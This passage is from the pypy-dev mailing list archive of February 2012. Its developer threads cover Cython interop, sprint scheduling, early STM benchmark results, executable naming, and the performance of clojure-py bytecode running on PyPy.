for being used for this? Do you mean there should be yet > another FFI? > > Simple questions: > > Is rffi usable in this context or is it not? Does it require RPython code > to be generated or does it also work with Python code? How do callbacks > work in rffi? 
Does rffi provide access to PyPy objects? And how so? > > I don't know all that much about RPython. Would it work to generate RPython > from Cython? Is there a transformation to map regular Python code down to > RPython? (e.g. by renaming variables, templating, specialising, etc.) > > Stefan Rffi is an internal RPython detail; it works before compilation but only as a testing layer. People should not use it (at least right now). Maybe it's actually reusable as an API, but needs to be extracted a bit from pypy in order to work on top of python (it imports something like 3/4 of the pypy source tree). It also only works by a very hackish layer on top of ctypes and it's surely not efficient. I imagine something slightly better that does roughly the same but does not have to be RPython. Cheers, fijal From stefan_ml at behnel.de Wed Feb 15 12:32:36 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 15 Feb 2012 12:32:36 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together Message-ID: Hi, I'm breaking out of the thread where this topic was started ("offtopic, ontopic, ...") because it is getting too long and unfocussed to follow. The current state of the discussion seems to be that PyPy provides ways to talk to C code, but nothing as complete as CPython's C-API in the sense that it allows efficient two-way communication between C code and Python objects. Thus, we need to either improve this or look for alternatives. In order to get us more focussed on what can be done and what the implications are, so that we may eventually be able to decide what should be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement Proposal). http://wiki.cython.org/enhancements/pypy Please add to it as you see fit.
In general, it is ok for a CEP to present diverging arguments, but please try to give them a structure in order to keep the overall document focussed. Stefan From arigo at tunes.org Wed Feb 15 15:24:42 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 15 Feb 2012 15:24:42 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: Hi, On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >> So let's plan to have the sprint dates announced no later than two weeks >> after the EuroPython dates are written on the EuroPython website. >> What do you think? The dates are now published: from the 2nd to the 6th of July, with sprints the 7-8th. Armin From anto.cuni at gmail.com Wed Feb 15 15:33:34 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Wed, 15 Feb 2012 15:33:34 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: <4F3BC23E.703@gmail.com> On 02/15/2012 03:24 PM, Armin Rigo wrote: > The dates are now published: from the 2nd to the 6th of July, with > sprints the 7-8th. we should also decide whether we want to have a post-EP sprint in Italy near Genova (possibly again in Pegli, or maybe somewhere else), although there is the risk that having a pre-EP sprint, EP and then another full sprint might become too intensive. What do people think about this?
From mmueller at python-academy.de Wed Feb 15 15:35:16 2012 From: mmueller at python-academy.de (=?ISO-8859-1?Q?Mike_M=FCller?=) Date: Wed, 15 Feb 2012 15:35:16 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: <4F3BC2A4.4000105@python-academy.de> Am 15.02.12 15:24, schrieb Armin Rigo: > Hi, > > On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >>> So let's plan to have the sprint dates announced no later than two weeks >>> after the EuroPython dates are written on the EuroPython website. >>> What do you think? > > The dates are now published: from the 2nd to the 6th of July, with > sprints the 7-8th. Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". The week before EuroPython starts Monday June 25, which gives us June 25 - June 30, 2012. Does this period fit? Do you want to shorten, shift or otherwise modify it? Cheers, Mike From fijall at gmail.com Wed Feb 15 16:09:45 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 15 Feb 2012 17:09:45 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3BC2A4.4000105@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: On Wed, Feb 15, 2012 at 4:35 PM, Mike Müller wrote: > Am 15.02.12 15:24, schrieb Armin Rigo: >> Hi, >> >> On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >>>> So let's plan to have the sprint dates announced no later than two weeks >>>> after the EuroPython dates are written on the EuroPython website. >>>> What do you think?
>> >> The dates are now published: from the 2nd to the 6th of July, with >> sprints the 7-8th. > > Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". > The week before EuroPython starts Monday June 25, which gives > us June 25 - June 30, 2012. Does this period fit? Do you want to > shorten, shift or otherwise modify it? Very good for me From arigo at tunes.org Wed Feb 15 17:52:31 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 15 Feb 2012 17:52:31 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: Hi, On Wed, Feb 15, 2012 at 16:09, Maciej Fijalkowski wrote: >> Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". >> The week before EuroPython starts Monday June 25, which gives >> us June 25 - June 30, 2012. Does this period fit? Do you want to >> shorten, shift or otherwise modify it? > > Very good for me It's not that great to have EuroPython immediately after the sprint without any day for recuperation. :-/ I would personally prefer it the previous week, for this reason. A bient?t, Armin. From fijall at gmail.com Wed Feb 15 17:54:45 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 15 Feb 2012 18:54:45 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: On Wed, Feb 15, 2012 at 6:52 PM, Armin Rigo wrote: > Hi, > > On Wed, Feb 15, 2012 at 16:09, Maciej Fijalkowski wrote: >>> Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". 
>> The week before EuroPython starts Monday June 25, which gives >> us June 25 - June 30, 2012. Does this period fit? Do you want to >> shorten, shift or otherwise modify it? > > Very good for me It's not that great to have EuroPython immediately after the sprint without any day for recuperation. :-/ I would personally prefer it the previous week, for this reason. A bientôt, Armin. From fijall at gmail.com Wed Feb 15 17:54:45 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 15 Feb 2012 18:54:45 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: On Wed, Feb 15, 2012 at 6:52 PM, Armin Rigo wrote: > Hi, > > On Wed, Feb 15, 2012 at 16:09, Maciej Fijalkowski wrote: >>> Good. Let's fix the date for the "PyPy Sprint Leipzig 2012".
With these constraints, it seems very unlikely that I'll manage to do the sprint :-( From arigo at tunes.org Thu Feb 16 21:58:18 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 21:58:18 +0100 Subject: [pypy-dev] STM status Message-ID: Hi all, An update for STM: today I managed to build a pypy using the new "stm gc". It runs richards.py on tannit: in 1 thread: 2320 ms per iteration in 2 threads: 1410 ms per iteration in 4 threads: 785 ms per iteration in 8 threads: 685 ms per iteration The small gap between 4 and 8 threads is due to tannit having only 4 "real" cpus, each one hyperthreaded. The additional gain is thus smaller than expected. For comparison, a "pypy --jit off" runs at 650ms per iteration. So the single-threaded performance is already at only 3.6x worse, and moreover there are still a few easy big-win optimizations. I will confirm it in a few days, but I would say that this shows it's working quite well. :-) At least, it's fun to see in "top" a single pypy process using 397% cpu :-) For people interested, it is in the "stm-gc" branch; at least bba9b03f5e70 works. Linux-only for now: " translate.py -O1 --stm targetpypystandalone --no-allworkingmodules --withmod-transaction --withmod-select --withmod-_socket ". The modified version of richards.py I use is in pypy/translator/stm/test/. A bient?t, Armin. From mmueller at python-academy.de Thu Feb 16 22:07:25 2012 From: mmueller at python-academy.de (=?ISO-8859-1?Q?Mike_M=FCller?=) Date: Thu, 16 Feb 2012 22:07:25 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? 
In-Reply-To: <4F3BEAFB.9000406@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> Message-ID: <4F3D700D.5010009@python-academy.de> Am 15.02.12 18:27, schrieb Antonio Cuni: > On 02/15/2012 05:52 PM, Armin Rigo wrote: >> It's not that great to have EuroPython immediately after the sprint >> without any day for recuperation. :-/ I would personally prefer it >> the previous week, for this reason. > > as for me, I'm busy in the days around 22-24 of june, and I also would like not > to have a sprint immediately before EP. > With these constraints, it seems very unlikely that I'll manage to do the > sprint :-( We can move the date. One week or only a few days? Like 22nd till 27th of June would put four days in between the sprint and EP. Mike From arigo at tunes.org Thu Feb 16 22:17:42 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 22:17:42 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3D700D.5010009@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> Message-ID: Hi Mike, On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: > We can move the date. One week or only a few days? Like 22nd till 27th > of June would put four days in between the sprint and EP. That would work too. Antonio, would such dates let you come to Leipzig for at least most of the sprint, or should we say "too bad" for you? A bient?t, Armin. 
From fijall at gmail.com Thu Feb 16 22:21:01 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Thu, 16 Feb 2012 23:21:01 +0200 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: On Thu, Feb 16, 2012 at 10:58 PM, Armin Rigo wrote: > Hi all, > > An update for STM: today I managed to build a pypy using the new "stm > gc". ?It runs richards.py on tannit: > > in 1 thread: 2320 ms per iteration > in 2 threads: 1410 ms per iteration > in 4 threads: 785 ms per iteration > in 8 threads: 685 ms per iteration > > The small gap between 4 and 8 threads is due to tannit having only 4 > "real" cpus, each one hyperthreaded. ?The additional gain is thus > smaller than expected. > > For comparison, a "pypy --jit off" runs at 650ms per iteration. ?So > the single-threaded performance is already at only 3.6x worse, and > moreover there are still a few easy big-win optimizations. ?I will > confirm it in a few days, but I would say that this shows it's working > quite well. :-) > > At least, it's fun to see in "top" a single pypy process using 397% cpu :-) > > For people interested, it is in the "stm-gc" branch; at least > bba9b03f5e70 works. ?Linux-only for now: ?" translate.py -O1 --stm > targetpypystandalone --no-allworkingmodules --withmod-transaction > --withmod-select --withmod-_socket ". ?The modified version of > richards.py I use is in pypy/translator/stm/test/. > > > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Wow great work! Seems like a JIT can do a good job here as well with removing extra overheads. From arigo at tunes.org Thu Feb 16 22:48:56 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 22:48:56 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Maciek, On Thu, Feb 16, 2012 at 22:21, Maciej Fijalkowski wrote: > Wow great work! 
Seems like a JIT can do a good job here as well with > removing extra overheads. Yes. That's still far away, though. But at the rhythm it's going, maybe in a couple of months...? A bientôt, Armin. From anto.cuni at gmail.com Fri Feb 17 00:27:25 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 00:27:25 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> Message-ID: <4F3D90DD.2010804@gmail.com> On 02/16/2012 10:17 PM, Armin Rigo wrote: > Hi Mike, > > On Thu, Feb 16, 2012 at 22:07, Mike Müller wrote: >> We can move the date. One week or only a few days? Like 22nd till 27th >> of June would put four days in between the sprint and EP. > > That would work too. Antonio, would such dates let you come to > Leipzig for at least most of the sprint, or should we say "too bad" > for you? yes, those dates might work for me. However, I'd prefer not to make any promises, so if people prefer to do 25-30, then too bad for me. Just pick the period that you prefer, and then if I manage I'll be glad to come. ciao, Anto From aaron.devore at gmail.com Fri Feb 17 03:41:19 2012 From: aaron.devore at gmail.com (Aaron DeVore) Date: Thu, 16 Feb 2012 18:41:19 -0800 Subject: [pypy-dev] Global executable naming policy Message-ID: There currently isn't an official naming scheme for the PyPy executable for system installations. Of the 3 setups I've seen, the official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses pypy-c. I brought up the similar issue of how to differentiate between Python 2 and 3 a while ago, but the conversation sputtered out.
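[Editorial note: distributions usually implement a naming scheme like the ones discussed here by installing one real, versioned binary and a set of symlinks for the convenience names. The sketch below illustrates that mechanism only; all file names and paths are made up for illustration and are not an official PyPy layout.]

```python
# Sketch: one real versioned executable, several convenience names
# resolving to it via symlinks. Names/paths are illustrative only.
import os
import tempfile

bindir = tempfile.mkdtemp()

# the "real" versioned executable (a stub shell script here)
real = os.path.join(bindir, "pypy-1.9")
with open(real, "w") as f:
    f.write("#!/bin/sh\necho PyPy 1.9\n")
os.chmod(real, 0o755)

# unversioned / language-level aliases all point at the same binary
for alias in ("pypy", "pypy2", "pypy2.7"):
    os.symlink("pypy-1.9", os.path.join(bindir, alias))

for name in sorted(os.listdir(bindir)):
    print(name, "->", os.path.realpath(os.path.join(bindir, name)))
```

An upgrade then only repoints the symlinks, which is why it is the versioned name (pypy-1.9 above) that has to stay unique.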
One possible naming scheme includes these executables using Python 2.7, Python 3.3, and PyPy 1.9 as an example:

pypy
pypy-1.9
pypy2
pypy2-1.9
pypy3
pypy3-1.9
pypy2.7
pypy2.7-1.9
pypy3.3
pypy3.3-1.9

-Aaron DeVore From william.leslie.ttg at gmail.com Fri Feb 17 03:57:35 2012 From: william.leslie.ttg at gmail.com (William ML Leslie) Date: Fri, 17 Feb 2012 13:57:35 +1100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On 17 February 2012 13:41, Aaron DeVore wrote: > There currently isn't an official naming scheme for the PyPy > executable for system installations. Of the 3 setups I've seen, the > official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses > pypy-c. I brought up the similar issue of how to > differentiate between Python 2 and 3 a while ago, but the conversation > sputtered out. On a related note, can we see situations where people only want to specify the language level, only want to specify the pypy version, or only want to specify the backend? Of course it is easy to specify /a specific installation/, and I suppose people want to be able to specify 'the default pypy' too. There is also the question of how much of this should be provided, and how much should be left to package maintainers or custom configuration; for Windows, 'pypy' and 'pypy3' are probably sufficient. -- William Leslie From aaron.devore at gmail.com Fri Feb 17 06:21:28 2012 From: aaron.devore at gmail.com (Aaron DeVore) Date: Thu, 16 Feb 2012 21:21:28 -0800 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: Gentoo's CPython package gives python, python2, python3, python2.x, and python3.x. Gentoo's PyPy package allows parallel PyPy versions by appending a version number. The names I listed would bring PyPy up to the level of CPython.
-Aaron DeVore > On a related note, can we see situations where people only want to > specify the language level, only want to specify the pypy version, or > only want to specify the backend? Of course it is easy to specify /a > specific installation/, and I suppose people want to be able to > specify 'the default pypy' too. There is also the question of how > much of this should be provided, and how much should be left to > package maintainers or custom configuration; for Windows, 'pypy' and > 'pypy3' are probably sufficient. > > -- > William Leslie From william.leslie.ttg at gmail.com Fri Feb 17 06:29:26 2012 From: william.leslie.ttg at gmail.com (William ML Leslie) Date: Fri, 17 Feb 2012 16:29:26 +1100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On 17 February 2012 16:21, Aaron DeVore wrote: > Gentoo's CPython package gives python, python2, python3, python2.x, > and python3.x. Gentoo's PyPy package allows parallel PyPy versions by > appending a version number. The names I listed would bring PyPy up to > the level of CPython. Sure, but the pypy equivalent of cpython is pypy-c. You would probably not want to have cpython and jython with the same name by default, nor would you probably want to have pypy-c and pypy-jvm with the same name. The reason it matters is that applications may depend on particular integration features, or not, in which case whatever backend is available is fine. -- William Leslie From dirkjan at ochtman.nl Fri Feb 17 09:43:27 2012 From: dirkjan at ochtman.nl (Dirkjan Ochtman) Date: Fri, 17 Feb 2012 09:43:27 +0100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 03:41, Aaron DeVore wrote: > There currently isn't an official naming scheme for the PyPy > executable for system installations. Of the 3 setups I've seen, the > official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses > pypy-c.
FWIW, if people feel it should be pypy instead of pypy-c, I'm happy to change it. Cheers, Dirkjan From fijall at gmail.com Fri Feb 17 09:46:52 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 10:46:52 +0200 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 10:43 AM, Dirkjan Ochtman wrote: > On Fri, Feb 17, 2012 at 03:41, Aaron DeVore wrote: >> There currently isn't an official naming scheme for the PyPy >> executable for system installations. Of the 3 setups I've seen, the >> official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses >> pypy-c. > > FWIW, if people feel it should be pypy instead of pypy-c, I'm happy to > change it. We (arbitrarily) decided pypy for binary distributions. It's still called pypy-c when it is compiled. I would go for pypy. Note that there is no point in pypy2.7-1.9, since there will never be any other pypy2 but pypy2.7. pypy3.3-1.9 sounds relatively obscure and verbose to me, but whatever. How about pypypy for pypy3 instead? () Cheers, fijal From tbaldridge at gmail.com Fri Feb 17 14:03:22 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 07:03:22 -0600 Subject: [pypy-dev] Poor performance with custom bytecode Message-ID: Last night, I was finally able to get enough of core.clj implemented to run a basic factorial program in clojure-py (https://github.com/halgari/clojure-py). In this project we use byteplay to generate bytecode for clojure routines, and run the entire language off the python vm. In general, I've been very impressed with the performance of pypy, but this factorial program takes about 2x longer to complete than the same routine running on CPython. Perhaps someone can give me some pointers? 
The core of the whole test is the factorial function: (ns clojure.examples.factorial) (defn fact [x] (loop [n x f 1] (if (= n 1) f (recur (dec n) (* f n))))) (defn test [times] (loop [rem times] (if (> rem 0) (do (fact 20000) (print rem) (recur (dec rem)))))) (test 20) It all seems to match normal python bytecode, with one exception: the implementation of *, = and >. In clojure these functions can take 0 to n arguments and perform different logic based on the results. Our solution? to stuff the arguments into __argsv__ and then perform a len() on this argument, and jump to different code blocks based on the length of the input tuple. Now I know this code may not be super fast, but it seems to work fine in CPython. Could this be the pain point for us in pypy? Any thoughts/ideas? clojure.examples.factorial=> (dis.dis *) 0 0 LOAD_FAST 0 (__argsv__) 3 LOAD_ATTR 0 (__len__) 6 CALL_FUNCTION 0 9 LOAD_CONST 1 (0) 12 COMPARE_OP 2 (==) 15 POP_JUMP_IF_FALSE 22 18 LOAD_CONST 2 (1) 21 RETURN_VALUE >> 22 LOAD_FAST 0 (__argsv__) 25 LOAD_ATTR 0 (__len__) 28 CALL_FUNCTION 0 31 LOAD_CONST 2 (1) 34 COMPARE_OP 2 (==) 37 POP_JUMP_IF_FALSE 54 40 LOAD_FAST 0 (__argsv__) 43 LOAD_CONST 1 (0) 46 BINARY_SUBSCR 47 STORE_FAST 1 (x) 50 LOAD_FAST 1 (x) 53 RETURN_VALUE >> 54 LOAD_FAST 0 (__argsv__) 57 LOAD_ATTR 0 (__len__) 60 CALL_FUNCTION 0 63 LOAD_CONST 3 (2) 66 COMPARE_OP 2 (==) 69 POP_JUMP_IF_FALSE 100 72 LOAD_FAST 0 (__argsv__) 75 LOAD_CONST 1 (0) 78 BINARY_SUBSCR 79 STORE_FAST 1 (x) 82 LOAD_FAST 0 (__argsv__) 85 LOAD_CONST 2 (1) 88 BINARY_SUBSCR 89 STORE_FAST 2 (y) 1010 92 LOAD_FAST 1 (x) 95 LOAD_FAST 2 (y) 98 BINARY_MULTIPLY 99 RETURN_VALUE >> 100 LOAD_FAST 0 (__argsv__) 103 LOAD_ATTR 0 (__len__) 106 CALL_FUNCTION 0 109 LOAD_CONST 3 (2) 112 COMPARE_OP 5 (>=) 115 POP_JUMP_IF_FALSE 173 118 LOAD_FAST 0 (__argsv__) 121 LOAD_CONST 1 (0) 124 BINARY_SUBSCR 125 STORE_FAST 1 (x) 128 LOAD_FAST 0 (__argsv__) 131 LOAD_CONST 2 (1) 134 BINARY_SUBSCR 135 STORE_FAST 2 (y) 138 LOAD_FAST 0 (__argsv__) 141 
LOAD_CONST 3 (2) 144 SLICE+1 145 STORE_FAST 3 (more) 1012 148 LOAD_GLOBAL 1 (reduce1) 151 LOAD_GLOBAL 2 (*) 154 LOAD_GLOBAL 2 (*) 157 LOAD_FAST 1 (x) 160 LOAD_FAST 2 (y) 163 CALL_FUNCTION 2 166 LOAD_FAST 3 (more) 169 CALL_FUNCTION 3 172 RETURN_VALUE >> 173 LOAD_CONST 4 () 176 CALL_FUNCTION 0 179 RAISE_VARARGS 1 None Thanks, Timothy Baldridge -- "One of the main causes of the fall of the Roman Empire was that--lacking zero--they had no way to indicate successful termination of their C programs." (Robert Firth) From anto.cuni at gmail.com Fri Feb 17 14:18:14 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 14:18:14 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: Message-ID: <4F3E5396.70705@gmail.com> Hello Timothy, On 02/17/2012 02:03 PM, Timothy Baldridge wrote: > clojure.examples.factorial=> (dis.dis *) > 0 0 LOAD_FAST 0 (__argsv__) > 3 LOAD_ATTR 0 (__len__) > 6 CALL_FUNCTION 0 I didn't look in depth at the bytecode produced by your compiler, but this is very sub-optimal. In pypy we have a custom opcode to call methods, which is much faster than LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >>>> def foo(x): .... return foo.__len__() .... >>>> import dis >>>> dis.dis(foo) 2 0 LOAD_GLOBAL 0 (foo) 3 LOOKUP_METHOD 1 (__len__) 6 CALL_METHOD 0 9 RETURN_VALUE In general, I suggest to use the jitviewer to look at which code the JIT generates: it shows you how many low level operations are emitted for each opcode, and you can compare with the same algorithm written in python to see what causes the most slowdown.
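As an aside for readers following the disassembly above: the arity dispatch that Timothy's generated bytecode performs is roughly equivalent to this pure-Python sketch (the function name and the use of * varargs in place of a real __argsv__ tuple are illustrative only, not clojure-py's actual implementation):

```python
from functools import reduce  # builtin in Python 2, stdlib in Python 3

def mul(*argsv):
    # Mirror the bytecode: take len() of the argument tuple, then
    # jump to the block that matches the arity.
    n = len(argsv)
    if n == 0:
        return 1                      # (*) with no args is the identity
    if n == 1:
        return argsv[0]
    if n == 2:
        return argsv[0] * argsv[1]
    # 3 or more: multiply the first two, then reduce over the rest,
    # like the LOAD_GLOBAL reduce1 path in the listing.
    x, y, more = argsv[0], argsv[1], argsv[2:]
    return reduce(lambda a, b: a * b, more, x * y)
```

Each `if` corresponds to one COMPARE_OP/POP_JUMP_IF_FALSE pair in the listing.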
ciao, Anto From anto.cuni at gmail.com Fri Feb 17 14:29:01 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 14:29:01 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> Message-ID: <4F3E561D.2080307@gmail.com> On 02/17/2012 02:27 PM, Timothy Baldridge wrote: >> In pypy we have a custom opcode to call methods, which is much faster than >> LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >> > > Excellent! I was unaware of this. Just last night I started > abstracting some bytecode generation to support both 2.6 and 2.7, so > it won't be hard to slot in improvements for pypy. > > From there, I'll start looking into jitviewer. I suggest to look at the jitviewer before doing this. I might be wrong and LOAD_ATTR/CALL_FUNCTION be efficient enough, I don't know. Also note that you should hit reply-all when replying, else you send the email only to the author and not to the ML (I re-added pypy-dev in CC). ciao, Anto From fijall at gmail.com Fri Feb 17 14:35:25 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 15:35:25 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: <4F3E561D.2080307@gmail.com> References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 3:29 PM, Antonio Cuni wrote: > On 02/17/2012 02:27 PM, Timothy Baldridge wrote: >>> >>> In pypy we have a custom opcode to call methods, which is much faster >>> than >>> LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >>> >> >> Excellent! I was unaware of this. Just last night I started >> abstracting some bytecode generation to support both 2.6 and 2.7, so >> it won't be hard to slot in improvements for pypy. >> >> From there, I'll start looking into jitviewer. > > I suggest to look at the jitviewer before doing this.
I might be wrong and > LOAD_ATTR/CALL_FUNCTION be efficient enough, I don't know. > > Also note that you should hit reply-all when replying, else you send the > email only to the author and not to the ML (I re-added pypy-dev in CC). > > > ciao, > Anto > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Hi Timothy. First question - why did you choose to implement this as a compiler to python bytecode? It does sound like an interpreter written in rpython would have both a much better performance and a much easier implementation (compiler vs interpreter). Cheers, fijal From tbaldridge at gmail.com Fri Feb 17 15:17:37 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 08:17:37 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: > First question - why did you choose to implement this as a compiler to > python bytecode? It does sound like an interpreter written in rpython > would have both a much better performance and a much easier > implementation (compiler vs interpreter). A few reasons for this. Mostly I didn't want to have to build up an entire standard lib. Clojure is a bit unique in that it doesn't define a standard library beyond the ~200 functions found in core.clj. This means that Clojure leaves IO, GUI, etc, completely up to the VM. So for stock Clojure this means you drop to Java interop whenever you want to do IO. If, however, I develop the entire thing off of CPython/pypy, I can use all the libraries for these platforms that are already quite documented and stable. "Don't re-invent the wheel" is more or less the mantra of Clojure implementation developers. Long term though, I plan on implementing part (if not all) of Clojure-py in RPython. 
This may be as simple as doing a pull request to pypy asking to have my immutable structures adopted into the stock VM, or I may attempt to build a from-scratch interpreter, we'll see. So I guess it's like this: I could go with a custom VM, but when I'm done, there's really not a whole lot my VM could do besides run benchmarks. Even as clojure-py stands now, you could probably sit down in one night and write a full blown Qt app via PySide with it, the interop with Python is that good. So as it stands, we can write apps with Django, PySide, numpy, etc. in Clojure and only after about 3 months worth of work! The other thing that has been bugging me more and more lately, is what benefit a RPython interpreter would get me. Besides Python's lack of overloaded functions, there's really no features in Python I can't find a use for in the Clojure compiler, and there's really nothing I'm lacking in the pypy VM. Timothy From tbaldridge at gmail.com Fri Feb 17 15:18:46 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 08:18:46 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Oh yeah, I forgot. The other nice thing about doing clojure-py in Python is that I should be able to write RPython code in Clojure. Lisp macros FTW! Timothy -- "One of the main causes of the fall of the Roman Empire was that--lacking zero--they had no way to indicate successful termination of their C programs." (Robert Firth) From celebdor at gmail.com Fri Feb 17 15:51:49 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 15:51:49 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Timothy, I'm new in the list and I was very recently planning to do a pet project implementing a clojure interpreter in RPython.
